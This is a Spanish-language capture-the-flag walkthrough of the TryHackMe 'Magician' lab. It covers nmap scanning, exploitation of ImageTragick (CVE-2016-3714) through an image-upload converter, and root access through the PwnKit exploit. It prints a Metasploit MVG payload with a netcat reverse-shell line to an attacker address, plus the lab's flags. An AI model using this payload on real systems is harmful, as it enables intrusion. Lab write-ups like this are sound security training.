I"s%<h2 id="writeup-máquina-magician">WriteUp máquina <strong>Magician</strong></h2>

<p>Esta es una maquina con un nivel de dificultad Fácil en TryHackme vamos a ello:</p>
<h3 id="fase-de-reconocimineto">Fase de reconocimineto</h3>
<p>Como primer paso realizamos un ping a la maquina para identificar ante que maquina estamos:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">PING 10.10.163.129 (10.10.163.129) 56(84) bytes of data.
64 bytes from 10.10.163.129: icmp_seq=1 ttl=63 time=236 ms
</span></code></pre></div></div>

<p>Como observamos la maquina nos responde con un TTL=63 por lo que nos enfrentamos a una maquina linux.</p>

<p>El siguiente paso es ver que puertos abiertos tiene la maquina por lo que realizamos el siguiente escaneo:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nmap -sS --min-rate 5000 -p- --open -vvv -n -Pn 10.10.163.129 -oA allPorts
</span></code></pre></div></div>
<p>Y vemos los siguientes puertos abiertos:</p>

<table>
  <tbody>
    <tr>
      <td><strong>PORT</strong></td>
      <td><strong>STATE SERVICE</strong></td>
      <td><strong>SERVICE</strong></td>
    </tr>
    <tr>
      <td>21/tcp</td>
      <td>open</td>
      <td>ftp</td>
    </tr>
    <tr>
      <td>8080/tcp</td>
      <td>open</td>
      <td>http-proxy</td>
    </tr>
    <tr>
      <td>8081/tcp</td>
      <td>open</td>
      <td>blackice-icecap</td>
    </tr>
  </tbody>
</table>

<p>Teniendo los puertos abiertos identificamos la version de los servicios expuestos con el siguiente comando:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nmap -sC -sV -p21,8080,8081 10.10.163.129 -oA targeted
</span></code></pre></div></div>
<p>Dando como resultado los siguientes servicios:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Host: 10.10.163.129 (10.10.163.129)	Status: Up
Host: 10.10.163.129 (10.10.163.129)	Ports: 21/open/tcp//ftp//vsftpd 2.0.8 or later/, 8080/open/tcp//http-proxy///, 8081/open/tcp//http//nginx 1.14.0 (Ubuntu)/
</span></code></pre></div></div>
<p>Inspeccionamos la web vemos dos puertos abiertos 8080 y 8081 en este caso nos enfocamos en el servicio web<br />
en el puerto 8081 ya que exsite una funcionalidad de subida de archivos donde la pagina convierte un archivo png a jpg:</p>

<p><img src="/images/writeup/magician/convert.png" alt="Panel" /></p>

<h3 id="fase-de-explotacion">Fase de explotacion</h3>

<p>Despues de revisar la funcionalidad del sitio web en el que se convierte un archivo png a jpg encontre una potencial vulnerabilidad: <em>CVE-2016-3714</em><br />
como primer paso hice uso del payload disponible en: <strong><a href="https://book.hacktricks.xyz/pentesting-web/file-upload#imagetragic">ImageTragic</a></strong> pero la shell no se establecia correctamente</p>

<p><img src="/images/writeup/magician/Primer.png" alt="Panel" /></p>

<p>Luego le heche un vistazo a un exploit disponible en metaslpoit:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf6 exploit(unix/fileformat/imagemagick_delegate) &gt;</span><span class="w"> </span>use exploit/linux/redis/redis_replication_cmd_exec
<span class="go">
</span><span class="gp">msf6 exploit(unix/fileformat/imagemagick_delegate) &gt;</span><span class="w"> </span>show options
<span class="go">
Module options (exploit/unix/fileformat/imagemagick_delegate):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME   msf.png          yes       Output file
   USE_POPEN  true             no        Use popen() vector


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
</span><span class="gp">   LHOST  &lt;IP&gt;</span><span class="w">             </span><span class="nb">yes       </span>The listen address <span class="o">(</span>an interface may be specified<span class="o">)</span>
<span class="go">   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   1   MVG file

</span></code></pre></div></div>
<p>Teniendo como resultado el siguiente payload generado en la ruta /root/.msf4/local/msf.png</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
</span><span class="gp">image Over 0,0 1,1 '|mkfifo /tmp/qjgz;</span><span class="w"> </span>nc &lt;IP&gt; 4444 0&lt;/tmp/qjgz | /bin/sh <span class="o">&gt;</span>/tmp/qjgz 2&gt;&amp;1<span class="p">;</span> <span class="nb">rm</span> /tmp/qjgz<span class="s1">'
</span><span class="go">pop graphic-context
pop graphic-context

</span></code></pre></div></div>
<p>Se puede subir directamente la imagen generar pero yo decidi simplemente copiar el contenido del archivo a la peticion<br />
interceptada de burpsuite:</p>

<p><img src="/images/writeup/magician/revburp.png" alt="Panel" /></p>

<p>Subiendo este archivo nos ponemos a la escucha con netcat y recibimos una shell reversa para luego hacer un tratamiento de la tty:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">root@parrot ▓▒░ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.89.16 55846
script /dev/null -c bash
Script started, file is /dev/null
</span><span class="gp">magician@magician:/tmp/hsperfdata_magician$</span><span class="w"> </span>^Z
<span class="go">zsh: suspended  nc -nlvp 4444

</span><span class="gp">root@parrot ▓▒░ stty raw -echo;</span><span class="w"> </span><span class="nb">fg</span>
<span class="go">[1]  + continued  nc -nlvp 4444
                               reset xterm
</span></code></pre></div></div>
<p>Exportamos las variables de entorno:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">magician@magician:/tmp/hsperfdata_magician$</span><span class="w"> </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
<span class="gp">magician@magician:/tmp/hsperfdata_magician$</span><span class="w"> </span><span class="nb">export </span><span class="nv">SHELL</span><span class="o">=</span>bash
<span class="go">
</span></code></pre></div></div>

<p>Y podemos ver la flag del usuario magician:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">THM{simsalabim_hex_hex}
</span></code></pre></div></div>
<h3 id="escalada-de-privilegios">Escalada de privilegios</h3>

<p>Como primer paso en la escalada de privilegios buscamos archivos suspechosos que puedan tener credenciales o archivos de configuracion<br />
en este caso encontramos un archivo 
<img src="/images/writeup/magician/archive.png" alt="Panel" /></p>

<p>Inspeccionando el contenido de este archivo nos encontramos con un mensaje:</p>

<p><strong>“The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.”</strong></p>

<p>El mensaje nos da a entender que hay un puerto a la escucha por lo que verificamos puertos abiertos por lo que verificamos puertos a la escucha:<br />
<img src="/images/writeup/magician/netstat.png" alt="Panel" /></p>

<p>Si bien no podemos ver este puerto desde afuera podemos realizar una tecnica llamada port forwarding con el siguiente comando:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">magician@magician:~$</span><span class="w"> </span>ssh <span class="nt">-R</span> 6666:127.0.0.1:6666 root@10.9.3.94                                                                                                                             
<span class="go">root@10.9.3.94's password:                                                                                                                                                                 
</span></code></pre></div></div>
<p>Asi redirigimos todo el trafico del puerto 6666 a nuestra maquina en el puerto 6666.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">root@parrot ▓▒░ echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d
THM{magic_may_make_many_men_mad}
</span></code></pre></div></div>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">magician@magician:/tmp$</span><span class="w"> </span><span class="nb">chmod</span> +x  PwnKit 
<span class="gp">magician@magician:/tmp$</span><span class="w"> </span>./PwnKit 
<span class="gp">root@magician:/tmp#</span><span class="w"> </span><span class="nb">cd</span> /root
<span class="gp">root@magician:~#</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">ImageMagick  flask  root.txt
</span><span class="gp">root@magician:~#</span><span class="w"> </span><span class="nb">cat </span>root.txt 
<span class="go">THM{magic_may_make_many_men_mad}
</span></code></pre></div></div>

:ET